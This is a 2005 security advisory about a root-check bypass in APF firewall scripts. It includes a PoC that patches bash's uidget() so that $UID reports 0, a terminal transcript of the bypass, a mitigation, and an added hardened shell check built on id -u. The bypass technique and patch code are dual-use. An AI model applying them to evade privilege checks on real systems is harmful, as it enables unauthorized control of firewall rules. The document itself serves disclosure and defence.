=====================================================
SB2005002: APF's uid(0) check routine is prone to bypass
-----------------------------------------------------

Date   : 01-13-2005
Author : x90c@xxxxxxxxxxxxxxxx/~jyj9782

----- Affected Version -----

apf-0.9.4-7 ( current at this time )

----- Summary -----

APF is a policy based iptables firewall system designed for ease of use
and configuration. It employs a subset of features to satisfy the veteran
Linux user and the novice alike. Packaged in tar.gz and RPM formats, APF
is ideal for deployment in any linux server environment.
(tarball description from the website, http://www.r-fx.org/apf.php)

1) Smallest Flaw

The apf and firewall scripts decide whether the caller is root by testing
the shell variable $UID ( if [ "$UID" != "0" ] ). The script never asks
the kernel for that value; it is set by whichever interpreter runs the
script, from the interpreter's own idea of the user id. A local user who
runs the scripts under a patched bash that reports uid 0 passes the
(root-only) check, as the PoC below shows, and could then use the admin
scripts (apf, firewall, ...) to change rules, start/stop the daemon and
so on. A root check that trusts the interpreter is dangerous even when
the flaw itself is this small.

In practice it probably cannot be exploited, because install.sh contains
"chmod 750 $INSPATH/firewall", so users outside root's group can neither
read nor execute the installed script. This report is about the
potential only.

----- PoC -----

STEP 1) Patch your bash source (vi shell.c +1099) as below, so that
uidget() reports uid/gid/euid/egid 0 instead of asking the kernel:

+ u = 0;
+ current_user.gid = 0;
+ current_user.euid = 0;
+ current_user.egid = 0;

-shell.c +1099-

static int
uidget ()
{
  uid_t u;

  u = 0;                        /* patched: was getuid () */
  if (current_user.uid != u)
    {
      FREE (current_user.user_name);
      FREE (current_user.shell);
      FREE (current_user.home_dir);
      current_user.user_name = current_user.shell = current_user.home_dir = (char *)NULL;
    }
  current_user.uid = u;
  current_user.gid = 0;         /* patched: was getgid () */
  current_user.euid = 0;        /* patched: was geteuid () */
  current_user.egid = 0;        /* patched: was getegid () */

  /* See whether or not we are running setuid or setgid. */
  return (current_user.uid != current_user.euid) ||
         (current_user.gid != current_user.egid);
}

STEP 2) Run the vulnerable scripts, which are meant to be run only by
root (uid 0), under the patched bash.
root@testbed:/home/s/apf-0.9.4-7# ls
CHANGELOG    README          apf.init    files       logrotate.d.apf
COPYING.GPL  README.antidos  cron.daily  install.sh
root@testbed:/home/s/apf-0.9.4-7# cd files
root@testbed:/home/s/apf-0.9.4-7/files# ls
VERSION            apf       deny_hosts.rules  extras     log.rules       sysctl.rules
ad                 bt.rules  doc               firewall   main.rules      vnet
allow_hosts.rules  conf.apf  ds_hosts.rules    internals  preroute.rules
root@testbed:/home/s/apf-0.9.4-7/files# grep "UID" *
apf:if [ "$UID" != "0" ]; then
firewall:if [ "$UID" != "0" ]; then
root@testbed:/home/s/apf-0.9.4-7/files#

I did not want to install APF, so I only tested the check itself, as
below. bash90 is the bash patched in STEP 1; fake_firewall is a stand-in
for the apf/firewall scripts that prints the $UID value the check tests.

root@testbed:/tmp# ls -al b* f*
-rwxr-xr-x  1 pt   pt   2969870 2005-01-08 01:23 bash90
-rwxrwxr-x  1 root root      24 2005-01-08 01:23 fake_firewall
root@testbed:/tmp# su pt
pt@testbed:/tmp$ id
uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
pt@testbed:/tmp$ echo $UID
1001
pt@testbed:/tmp$ ./bash90
root@testbed:/tmp# echo $UID
0
root@testbed:/tmp# id
uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
root@testbed:/tmp# ./fake_firewall
1001
root@testbed:/tmp# exit
exit
pt@testbed:/tmp$ ./bash90 fake_firewall
0
pt@testbed:/tmp$

Two details of the transcript matter. Executed directly, ./fake_firewall
prints 1001 even from inside bash90, because the script is started by its
own interpreter (presumably the system bash via its #! line), which sets
$UID from getuid(); only when the patched interpreter itself runs the
script (./bash90 fake_firewall) does the check see 0. And id(1) keeps
reporting uid=1001 inside bash90: the patch changes what bash believes
about itself (hence the "root@" prompt and $UID), not the process
credentials held by the kernel. The bypass therefore requires the attacker
to read the script and feed it to an interpreter of their choosing, which
is what the chmod 750 in install.sh prevents.

----- Solution -----

# cp /bin/id /firewall_path/secure_id
# chmod 700 /firewall_path/secure_id

and change the scripts to obtain the uid from that binary (a separate
process that asks the kernel via getuid(2)) instead of from the shell's
$UID. Alternatively, I recommend upgrading to a newer release.

----- Credits -----

This smallest flaw was found by x90c (Kyong Joo, Jung) personally.
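As an added example (not the advisory's PoC and not APF's own code), the
following script puts the apf/firewall-style check beside a check that asks
the kernel, in the spirit of the secure_id suggestion above. It assumes
id(1) is installed and that `command -p` (POSIX default PATH lookup) is
available; the function names and the fail-closed require_root() are this
example's own. Under an unmodified bash both checks agree; under the
patched bash90 only the kernel-backed check still refuses a non-root user.

```shell
#!/bin/sh
# Added example, not part of the advisory or of APF.
# Two ways a script can decide whether it is running as root, and why only
# one of them survives the patched-bash PoC above.

# As in apf/firewall: trusts $UID, a value the *interpreter* computes for
# itself (bash sets it in uidget(); the patched bash makes it 0 for anyone).
check_via_shell_var() {
    [ "${UID:-unset}" = "0" ]
}

# Hardened: id(1) is a separate process that calls getuid(2); the shell
# running this script has no say in the answer. 'command -p' searches the
# system default PATH rather than the caller's, so a fake id dropped into
# $PATH is not picked up. The advisory's secure_id copy achieves the same
# with an absolute path; substitute that path here if you install one.
kernel_uid() {
    command -p id -u
}

check_via_kernel() {
    [ "$(kernel_uid)" = "0" ]
}

# Fail closed: refuse unless the kernel says root, and refuse as well when
# the interpreter's $UID disagrees with the kernel, which is exactly the
# state bash90 produces (return codes: 0 ok, 1 not root, 2 id failed,
# 3 interpreter/kernel mismatch).
require_root() {
    local kuid
    kuid=$(kernel_uid) || return 2
    if [ "$kuid" != "0" ]; then
        echo "$0: must be run as root (kernel reports uid $kuid)" >&2
        return 1
    fi
    if [ "${UID:-unset}" != "$kuid" ]; then
        echo "$0: shell UID (${UID:-unset}) != getuid() ($kuid), refusing" >&2
        return 3
    fi
    return 0
}

# Print both views side by side; run this under bash90 to see them diverge.
show_uid_views() {
    printf 'shell UID : %s\nid -u     : %s\n' "${UID:-unset}" "$(kernel_uid)"
}

show_uid_views
require_root && echo "root check passed"
```

Run it as an ordinary user with `./check.sh`, then with `./bash90 check.sh`:
the shell UID line changes to 0 while the id -u line and the refusal do
not.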